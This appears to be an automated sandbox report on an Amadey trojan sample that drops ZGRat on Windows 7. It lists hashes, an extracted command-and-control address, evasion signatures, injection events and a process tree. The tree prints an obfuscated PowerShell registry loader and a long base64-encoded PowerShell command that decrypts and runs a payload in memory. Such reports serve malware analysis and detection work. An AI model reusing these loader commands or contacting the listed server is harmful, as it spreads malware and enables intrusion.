amadey | 3ed263e2d66c3a0dcace52a0755ce7eae5f72e352190286c9e5151e5bf5d0d77

Resubmissions

14-05-2024 20:58

240514-zsfmfsgb6s 10

14-05-2024 20:53

240514-zplpasfh6x 10

14-05-2024 19:25

240514-x4yajach28 10

Analysis

max time kernel
1200s
max time network
1090s
platform
windows7_x64
resource
win7-20231129-en
resource tags

arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
submitted
14-05-2024 20:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3ed263e2d66c3a0dcace52a0755ce7eae5f72e352190286c9e5151e5bf5d0d77.exe
Size

1.8MB
MD5

2307c3f2702a53fdc03bf2f05fe51a25
SHA1

5d31c179f4d5e0831fb5ad877fbfe8fe6b88a26d
SHA256

3ed263e2d66c3a0dcace52a0755ce7eae5f72e352190286c9e5151e5bf5d0d77
SHA512

14c7feba21ae7b6b3e3d1bf06a8dea88c784ba1e5e86ffd9724be66ef880bfb89c66ae5f906e1d7c9fc18635b892ec32255ecad57dd71c11d4e40a2f9922e6bf
SSDEEP

49152:VKrUl9aoaN6dMU27MyNw2e9ObxiFlWukA+dEoBpck6Co:VKrb6bmw2mOliFlWuQxpcN

Score

10^/10

amadey zgrat evasion execution rat trojan

Malware Config

Extracted

Family

amadey

Version

4.20

http://5.42.96.7

Attributes

install_dir
7af68cdb52
install_file
axplons.exe
strings_key
e2ce58e78f631ed97d01fe7b70e85d5e
url_paths
/zamo7h/index.php

rc4.plain

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Detect ZGRat V1 6 IoCs

resource	yara_rule
behavioral1/memory/2256-116-0x0000000006120000-0x0000000006360000-memory.dmp	family_zgrat_v1
behavioral1/memory/2256-118-0x0000000006120000-0x000000000635A000-memory.dmp	family_zgrat_v1
behavioral1/memory/2256-120-0x0000000006120000-0x000000000635A000-memory.dmp	family_zgrat_v1
behavioral1/memory/2256-124-0x0000000006120000-0x000000000635A000-memory.dmp	family_zgrat_v1
behavioral1/memory/2256-122-0x0000000006120000-0x000000000635A000-memory.dmp	family_zgrat_v1
behavioral1/memory/2256-117-0x0000000006120000-0x000000000635A000-memory.dmp	family_zgrat_v1

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 3484 created 436	3484	powershell.EXE	5

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	3ed263e2d66c3a0dcace52a0755ce7eae5f72e352190286c9e5151e5bf5d0d77.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe

Downloads MZ/PE file

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	3ed263e2d66c3a0dcace52a0755ce7eae5f72e352190286c9e5151e5bf5d0d77.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	3ed263e2d66c3a0dcace52a0755ce7eae5f72e352190286c9e5151e5bf5d0d77.exe

Executes dropped EXE 4 IoCs

pid	Process
2604	axplons.exe
1924	file300un.exe
2256	Kaxhwswfup.exe
3360	$77401b33

Identifies Wine through registry keys 2 TTPs 2 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Wine	3ed263e2d66c3a0dcace52a0755ce7eae5f72e352190286c9e5151e5bf5d0d77.exe
Key opened	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Wine	axplons.exe

Loads dropped DLL 5 IoCs

pid	Process
2240	3ed263e2d66c3a0dcace52a0755ce7eae5f72e352190286c9e5151e5bf5d0d77.exe
2604	axplons.exe
2604	axplons.exe
2604	axplons.exe
2256	Kaxhwswfup.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2240	3ed263e2d66c3a0dcace52a0755ce7eae5f72e352190286c9e5151e5bf5d0d77.exe
2604	axplons.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 2256 set thread context of 3360	2256	Kaxhwswfup.exe	37
PID 3484 set thread context of 3556	3484	powershell.EXE	41

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\axplons.job	3ed263e2d66c3a0dcace52a0755ce7eae5f72e352190286c9e5151e5bf5d0d77.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
940	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 80214bc444a6da01	powershell.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2240	3ed263e2d66c3a0dcace52a0755ce7eae5f72e352190286c9e5151e5bf5d0d77.exe
2604	axplons.exe
940	powershell.exe
3484	powershell.EXE
3484	powershell.EXE
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe
3556	dllhost.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

description	pid	Process
Token: SeDebugPrivilege	940	powershell.exe
Token: SeDebugPrivilege	2256	Kaxhwswfup.exe
Token: SeDebugPrivilege	3484	powershell.EXE
Token: SeDebugPrivilege	3484	powershell.EXE
Token: SeDebugPrivilege	3556	dllhost.exe
Token: SeShutdownPrivilege	1336	Explorer.EXE
Token: SeAuditPrivilege	868	svchost.exe
Token: SeShutdownPrivilege	1336	Explorer.EXE
Token: SeShutdownPrivilege	1336	Explorer.EXE

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2240	3ed263e2d66c3a0dcace52a0755ce7eae5f72e352190286c9e5151e5bf5d0d77.exe

Suspicious use of WriteProcessMemory 60 IoCs

description	pid	Process	procid_target
PID 2240 wrote to memory of 2604	2240	3ed263e2d66c3a0dcace52a0755ce7eae5f72e352190286c9e5151e5bf5d0d77.exe	28
PID 2240 wrote to memory of 2604	2240	3ed263e2d66c3a0dcace52a0755ce7eae5f72e352190286c9e5151e5bf5d0d77.exe	28
PID 2240 wrote to memory of 2604	2240	3ed263e2d66c3a0dcace52a0755ce7eae5f72e352190286c9e5151e5bf5d0d77.exe	28
PID 2240 wrote to memory of 2604	2240	3ed263e2d66c3a0dcace52a0755ce7eae5f72e352190286c9e5151e5bf5d0d77.exe	28
PID 2604 wrote to memory of 1924	2604	axplons.exe	29
PID 2604 wrote to memory of 1924	2604	axplons.exe	29
PID 2604 wrote to memory of 1924	2604	axplons.exe	29
PID 2604 wrote to memory of 1924	2604	axplons.exe	29
PID 1924 wrote to memory of 940	1924	file300un.exe	31
PID 1924 wrote to memory of 940	1924	file300un.exe	31
PID 1924 wrote to memory of 940	1924	file300un.exe	31
PID 2604 wrote to memory of 2256	2604	axplons.exe	36
PID 2604 wrote to memory of 2256	2604	axplons.exe	36
PID 2604 wrote to memory of 2256	2604	axplons.exe	36
PID 2604 wrote to memory of 2256	2604	axplons.exe	36
PID 2256 wrote to memory of 3360	2256	Kaxhwswfup.exe	37
PID 2256 wrote to memory of 3360	2256	Kaxhwswfup.exe	37
PID 2256 wrote to memory of 3360	2256	Kaxhwswfup.exe	37
PID 2256 wrote to memory of 3360	2256	Kaxhwswfup.exe	37
PID 2256 wrote to memory of 3360	2256	Kaxhwswfup.exe	37
PID 2256 wrote to memory of 3360	2256	Kaxhwswfup.exe	37
PID 2256 wrote to memory of 3360	2256	Kaxhwswfup.exe	37
PID 2256 wrote to memory of 3360	2256	Kaxhwswfup.exe	37
PID 2256 wrote to memory of 3360	2256	Kaxhwswfup.exe	37
PID 2256 wrote to memory of 3360	2256	Kaxhwswfup.exe	37
PID 3448 wrote to memory of 3484	3448	taskeng.exe	39
PID 3448 wrote to memory of 3484	3448	taskeng.exe	39
PID 3448 wrote to memory of 3484	3448	taskeng.exe	39
PID 3484 wrote to memory of 3556	3484	powershell.EXE	41
PID 3484 wrote to memory of 3556	3484	powershell.EXE	41
PID 3484 wrote to memory of 3556	3484	powershell.EXE	41
PID 3484 wrote to memory of 3556	3484	powershell.EXE	41
PID 3484 wrote to memory of 3556	3484	powershell.EXE	41
PID 3484 wrote to memory of 3556	3484	powershell.EXE	41
PID 3484 wrote to memory of 3556	3484	powershell.EXE	41
PID 3484 wrote to memory of 3556	3484	powershell.EXE	41
PID 3484 wrote to memory of 3556	3484	powershell.EXE	41
PID 3556 wrote to memory of 436	3556	dllhost.exe	5
PID 3556 wrote to memory of 484	3556	dllhost.exe	6
PID 3556 wrote to memory of 492	3556	dllhost.exe	7
PID 3556 wrote to memory of 500	3556	dllhost.exe	8
PID 3556 wrote to memory of 608	3556	dllhost.exe	9
PID 3556 wrote to memory of 692	3556	dllhost.exe	10
PID 3556 wrote to memory of 756	3556	dllhost.exe	11
PID 3556 wrote to memory of 824	3556	dllhost.exe	12
PID 3556 wrote to memory of 868	3556	dllhost.exe	13
PID 3556 wrote to memory of 1000	3556	dllhost.exe	15
PID 3556 wrote to memory of 344	3556	dllhost.exe	16
PID 3556 wrote to memory of 400	3556	dllhost.exe	17
PID 3556 wrote to memory of 1036	3556	dllhost.exe	18
PID 3556 wrote to memory of 1184	3556	dllhost.exe	19
PID 3556 wrote to memory of 1284	3556	dllhost.exe	20
PID 3556 wrote to memory of 1336	3556	dllhost.exe	21
PID 3556 wrote to memory of 1816	3556	dllhost.exe	23
PID 3556 wrote to memory of 3028	3556	dllhost.exe	24
PID 3556 wrote to memory of 2420	3556	dllhost.exe	25
PID 3556 wrote to memory of 2604	3556	dllhost.exe	28
PID 3556 wrote to memory of 2920	3556	dllhost.exe	35
PID 3556 wrote to memory of 2256	3556	dllhost.exe	36
PID 3556 wrote to memory of 3448	3556	dllhost.exe	38

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:436
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{40b3bee2-c16d-4506-bb42-2bd5dee046c5}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3556

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
PID:484
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k DcomLaunch
  2⤵
  PID:608
- - C:\Windows\system32\DllHost.exe
    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
    3⤵
    PID:1816
- - C:\Windows\system32\wbem\wmiprvse.exe
    C:\Windows\system32\wbem\wmiprvse.exe -Embedding
    3⤵
    PID:2920
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k RPCSS
  2⤵
  PID:692
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
  2⤵
  PID:756
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
  2⤵
  PID:824
- - C:\Windows\system32\Dwm.exe
    "C:\Windows\system32\Dwm.exe"
    3⤵
    PID:1284
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k netsvcs
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:868
- - C:\Windows\system32\taskeng.exe
    taskeng.exe {E4E75DA4-4324-45CF-A122-76183CFBFFA5} S-1-5-18:NT AUTHORITY\System:Service:
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3448
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'F'+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+'E').GetValue(''+'$'+''+'7'+''+[Char](55)+''+'s'+''+[Char](116)+'ag'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Drops file in System32 directory
      Suspicious use of SetThreadContext
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3484
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalService
  2⤵
  PID:1000
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k NetworkService
  2⤵
  PID:344
- C:\Windows\System32\spoolsv.exe
  C:\Windows\System32\spoolsv.exe
  2⤵
  PID:400
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
  2⤵
  PID:1036
- C:\Windows\system32\taskhost.exe
  "taskhost.exe"
  2⤵
  PID:1184
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
  2⤵
  PID:3028
- C:\Windows\system32\sppsvc.exe
  C:\Windows\system32\sppsvc.exe
  2⤵
  PID:2420

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:492

C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
1⤵
PID:500

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1336
- C:\Users\Admin\AppData\Local\Temp\3ed263e2d66c3a0dcace52a0755ce7eae5f72e352190286c9e5151e5bf5d0d77.exe
  "C:\Users\Admin\AppData\Local\Temp\3ed263e2d66c3a0dcace52a0755ce7eae5f72e352190286c9e5151e5bf5d0d77.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Identifies Wine through registry keys
  - Loads dropped DLL
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID:2240
- - C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
    "C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Loads dropped DLL
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:2604
  - - C:\Users\Admin\AppData\Local\Temp\1000042001\file300un.exe
      "C:\Users\Admin\AppData\Local\Temp\1000042001\file300un.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:1924
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgANQAwADAAMAApAAoACgAkAFQAZQBtAHAARABpAHIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAKACQAUABhAHQAdABlAHIAbgAgAD0AIAAnAGYAaQBsAGUALQAqAC4AcAB1AHQAaQBrACcACgAkAEwAYQB0AGUAcwB0AEYAaQBsAGUAIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAVABlAG0AcABEAGkAcgAgAC0ARgBpAGwAdABlAHIAIAAkAFAAYQB0AHQAZQByAG4AIAB8ACAAUwBvAHIAdAAtAE8AYgBqAGUAYwB0ACAATABhAHMAdABXAHIAaQB0AGUAVABpAG0AZQAgAC0ARABlAHMAYwBlAG4AZABpAG4AZwAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBGAGkAcgBzAHQAIAAxAAoACgBmAHUAbgBjAHQAaQBvAG4AIADjicZbIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAKWUGVMsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkABFUz5EsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAHBlbmMKACAAIAAgACAAKQAKAAoAIAAgACAAIAAkAKBSxltoViAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJACgUsZbaFYuAE0AbwBkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQwBpAHAAaABlAHIATQBvAGQAZQBdADoAOgBDAEIAQwAKACAAIAAgACAAJACgUsZbaFYuAFAAYQBkAGQAaQBuAGcAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AUABhAGQAZABpAG4AZwBNAG8AZABlAF0AOgA6AFAASwBDAFMANwAKAAoAIAAgACAAIAAkAOOJxltoViAAPQAgACQAoFLGW2hWLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQApZQZUywAIAAkABFUz5EpAAoAIAAgACAAIAAkAOOJxltwZW5jIAA9ACAAJADjicZbaFYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkAHBlbmMsACAAMAAsACAAJABwZW5jLgBMAGUAbgBnAHQAaAApAAoACQAKACAAIAAgACAAcgBlAHQAdQByAG4AIAAkAOOJxltwZW5jCgB9AAoACgAkAKWUGVMgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeABFAEMALAAgADAAeAA2AEYALAAgADAAeAAzADYALAAgADAAeAAwAEUALAAgADAAeAAyAEMALAAgADAAeAA0ADYALAAgADAAeAAwADMALAAgADAAeAA4AEMALAAgADAAeABCADUALAAgADAAeABGAEYALAAgADAAeAAxADAALAAgADAAeABBADUALAAgADAAeAAyADUALAAgADAAeAA4AEIALAAgADAAeAAxAEIALAAgADAAeAA3ADkALAAgADAAeABCAEMALAAgADAAeABBADUALAAgADAAeAAzADkALAAgADAAeAA0ADgALAAgADAAeABFADIALAAgADAAeAA2ADIALAAgADAAeAA4ADUALAAgADAAeAAyADgALAAgADAAeAAzADcALAAgADAAeABCAEYALAAgADAAeAA0ADEALAAgADAAeABBAEQALAAgADAAeAAxADgALAAgADAAeAAxADYALAAgADAAeAA5AEMALAAgADAAeAAwAEQAKQAKACQAEVTPkSAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4ADUARgAsACAAMAB4AEYAQwAsACAAMAB4ADgAQwAsACAAMAB4ADcAQwAsACAAMAB4ADMAOQAsACAAMAB4ADcANQAsACAAMAB4ADAAOQAsACAAMAB4AEYAQwAsACAAMAB4AEIAOQAsACAAMAB4ADcAMQAsACAAMAB4AEYAQwAsACAAMAB4AEUAQgAsACAAMAB4ADQAQQAsACAAMAB4AEUARQAsACAAMAB4AEIARgAsACAAMAB4ADcANgApAAoACgBpAGYAIAAoACQATABhAHQAZQBzAHQARgBpAGwAZQAgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAIdl9k7vjYRfIAA9ACAAJABMAGEAdABlAHMAdABGAGkAbABlAC4ARgB1AGwAbABOAGEAbQBlAAoAIAAgACAAIAAkAKBSxltXW4KCIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAIdl9k7vjYRfKQA7AAoAIAAgACAAIAAkAOOJxluFUblbIAA9ACAA44nGWyAALQCllBlTIAAkAKWUGVMgAC0AEVTPkSAAJAARVM+RIAAtAHBlbmMgACQAoFLGW1dbgoIKAAoAIAAgACAAIAAkAAt6j17GliAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQA44nGW4VRuVspACkAOwAKACAAIAAgACAAJABlUeNTuXAgAD0AIAAkAAt6j17Gli4ARQBuAHQAcgB5AFAAbwBpAG4AdAA7AAoAIAAgACAAIAAkAGVR41O5cC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:940
  - - C:\Users\Admin\AppData\Local\Temp\1000043001\Kaxhwswfup.exe
      "C:\Users\Admin\AppData\Local\Temp\1000043001\Kaxhwswfup.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of SetThreadContext
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2256
    - - C:\Users\Admin\AppData\Local\Temp\$77401b33
        
        "C:\Users\Admin\AppData\Local\Temp\$77401b33"
        5⤵
        Executes dropped EXE
        
        PID:3360

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\1000042001\file300un.exe

Filesize
749KB

MD5
ec071dde7d9bec968e6765d245824a66

SHA1
06f82c9e241ba768a43009925a5b081f8f955932

SHA256
21aaa33d1cd4d9f0de4f60a35c4694ba926e7e01118a8c14b2fd8856a71774c9

SHA512
cd87e5a07480c84ef9cf3dfd5feeb81506d1ecce49b17c6587cb3163ab2d9d3cc8ac1ebfbbb5b08cef7a74f07ead2bb6fa1bccb290fe1b31ce7dd8d1751325e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000043001\Kaxhwswfup.exe

Filesize
4.5MB

MD5
133fda00a490e613f3a6c511c1c660eb

SHA1
e34f9f1c622a7e6d3cb34217b0935ebdaab8ebe9

SHA256
cac0056b23a93519a5f4e526e52187f37b88373c76aa065b9f895d1ecd4f4169

SHA512
f4dd02b04326e37a3368d9c385b363689f877ae43c16de103efada642f41fe85580939db84a030597e3032d6da407d073af2b64160feec6fe38f37f1b473fffd

Download Submit
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe

Filesize
1.8MB

MD5
2307c3f2702a53fdc03bf2f05fe51a25

SHA1
5d31c179f4d5e0831fb5ad877fbfe8fe6b88a26d

SHA256
3ed263e2d66c3a0dcace52a0755ce7eae5f72e352190286c9e5151e5bf5d0d77

SHA512
14c7feba21ae7b6b3e3d1bf06a8dea88c784ba1e5e86ffd9724be66ef880bfb89c66ae5f906e1d7c9fc18635b892ec32255ecad57dd71c11d4e40a2f9922e6bf

Download Submit
C:\Users\Admin\AppData\Local\Temp\file-19654.putik

Filesize
20KB

MD5
b897e34dc596b0503848dc48aba076b5

SHA1
32a89eb9c0d59a975e508a771299115e0595a125

SHA256
a9368959bf394dd7d4d5c0cc59cea42bcbc7db76b28196ab9022285472ad94e8

SHA512
2dd32d126dcdc37065c902c2273d1814bb5ca555244be8ca042636407cc3a3b23b1fb429f85ad5aaeaed657e529ba4fa9d32ecdcb782b36a935f0232a88cf724

Download Submit
memory/940-42-0x0000000002390000-0x0000000002398000-memory.dmp

Filesize
32KB

Download
memory/940-41-0x000000001B6A0000-0x000000001B982000-memory.dmp

Filesize
2.9MB

Download
memory/940-44-0x0000000002A70000-0x0000000002A7A000-memory.dmp

Filesize
40KB

Download
memory/2240-15-0x00000000010B0000-0x000000000156E000-memory.dmp

Filesize
4.7MB

Download
memory/2240-2-0x00000000010B1000-0x00000000010DF000-memory.dmp

Filesize
184KB

Download
memory/2240-5-0x00000000010B0000-0x000000000156E000-memory.dmp

Filesize
4.7MB

Download
memory/2240-3-0x00000000010B0000-0x000000000156E000-memory.dmp

Filesize
4.7MB

Download
memory/2240-1-0x0000000077080000-0x0000000077082000-memory.dmp

Filesize
8KB

Download
memory/2240-0-0x00000000010B0000-0x000000000156E000-memory.dmp

Filesize
4.7MB

Download
memory/2256-4998-0x0000000000AE0000-0x0000000000B2C000-memory.dmp

Filesize
304KB

Download
memory/2256-4997-0x0000000004760000-0x00000000047DE000-memory.dmp

Filesize
504KB

Download
memory/2256-117-0x0000000006120000-0x000000000635A000-memory.dmp

Filesize
2.2MB

Download
memory/2256-122-0x0000000006120000-0x000000000635A000-memory.dmp

Filesize
2.2MB

Download
memory/2256-124-0x0000000006120000-0x000000000635A000-memory.dmp

Filesize
2.2MB

Download
memory/2256-120-0x0000000006120000-0x000000000635A000-memory.dmp

Filesize
2.2MB

Download
memory/2256-118-0x0000000006120000-0x000000000635A000-memory.dmp

Filesize
2.2MB

Download
memory/2256-116-0x0000000006120000-0x0000000006360000-memory.dmp

Filesize
2.2MB

Download
memory/2256-115-0x00000000000B0000-0x0000000000536000-memory.dmp

Filesize
4.5MB

Download
memory/2256-5193-0x0000000002430000-0x0000000002484000-memory.dmp

Filesize
336KB

Download
memory/2604-71-0x0000000000A30000-0x0000000000EEE000-memory.dmp

Filesize
4.7MB

Download
memory/2604-83-0x0000000000A30000-0x0000000000EEE000-memory.dmp

Filesize
4.7MB

Download
memory/2604-54-0x0000000000A30000-0x0000000000EEE000-memory.dmp

Filesize
4.7MB

Download
memory/2604-55-0x0000000000A30000-0x0000000000EEE000-memory.dmp

Filesize
4.7MB

Download
memory/2604-56-0x0000000000A30000-0x0000000000EEE000-memory.dmp

Filesize
4.7MB

Download
memory/2604-57-0x0000000000A30000-0x0000000000EEE000-memory.dmp

Filesize
4.7MB

Download
memory/2604-58-0x0000000000A30000-0x0000000000EEE000-memory.dmp

Filesize
4.7MB

Download
memory/2604-59-0x0000000000A30000-0x0000000000EEE000-memory.dmp

Filesize
4.7MB

Download
memory/2604-60-0x0000000000A30000-0x0000000000EEE000-memory.dmp

Filesize
4.7MB

Download
memory/2604-61-0x0000000000A30000-0x0000000000EEE000-memory.dmp

Filesize
4.7MB

Download
memory/2604-62-0x0000000000A30000-0x0000000000EEE000-memory.dmp

Filesize
4.7MB

Download
memory/2604-63-0x0000000000A30000-0x0000000000EEE000-memory.dmp

Filesize
4.7MB

Download
memory/2604-64-0x0000000000A30000-0x0000000000EEE000-memory.dmp

Filesize
4.7MB

Download
memory/2604-65-0x0000000000A30000-0x0000000000EEE000-memory.dmp

Filesize
4.7MB

Download
memory/2604-66-0x0000000000A30000-0x0000000000EEE000-memory.dmp

Filesize
4.7MB

Download
